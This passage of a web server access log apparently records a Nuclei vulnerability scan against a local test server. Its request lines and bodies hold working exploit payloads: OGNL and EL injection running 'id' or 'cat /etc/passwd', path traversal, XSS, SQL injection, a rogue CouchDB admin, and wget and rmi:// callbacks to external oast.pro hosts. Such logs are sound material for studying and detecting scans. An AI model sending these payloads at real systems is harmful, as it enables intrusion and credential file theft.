+0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=cat /etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2212.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(364536*876356);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=type C:\x5C\x5CWindows\x5C\x5Cwin.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/297MPR016t1xeXOnvShDcmnWweZ.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22user\x22,\x0D\x0A \x22name\x22: \x22poc\x22,\x0D\x0A \x22roles\x22: [\x22_admin\x22],\x0D\x0A \x22roles\x22: [],\x0D\x0A \x22password\x22: \x22123456\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_users/org.couchdb.user:poc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('297MPPmQYZ8QovSfTTVva2InZ9J')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('297MPPmQYZ8QovSfTTVva2InZ9J')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wsdl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login_scr.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.002","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat+%2Fetc%2Fpasswd')]=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type+C%3A%2FWindows%2Fwin.ini')]=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/auth/roles HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:35 +0000","request_body":"\x0D\x0A \x0D\x0A HTTP://127.0.0.1/wsman/\x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\x0D\x0A \x0D\x0A http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous\x0D\x0A \x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript\x0D\x0A 102400\x0D\x0A uuid:00B60932-CC01-0005-0000-000000010000\x0D\x0A PT1M30S\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A root/scx\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A aWQ=\x0D\x0A \x0D\x0A 0\x0D\x0A true\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wsman HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=probes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=requests HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/dbstat/gettablessize HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.164","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.125","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.123","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/dataSources.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://c9v8gvgsmpv8bafg0t00ewqntag56w35z.oast.pro%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://c9v8gvgsmpv8bafg0t00ckx6da7ezbeaq.oast.pro%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.122","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"{\x22email\x22:\x22invalid\x22,\x22signUpContext\x22:{},\x22secondaryEmail\x22:\x22\x22,\x22usingNewUi\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servicedesk/customer/user/signup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.132","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.xbean.propertyeditor.JndiConverter\x22,\x0D\x0A \x22AsText\x22:\x22rmi://c9v8gvgsmpv8bafg0t00hyeqc15ibmidg.oast.pro/exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.130","http_user_agent":"Mozilla/5.0 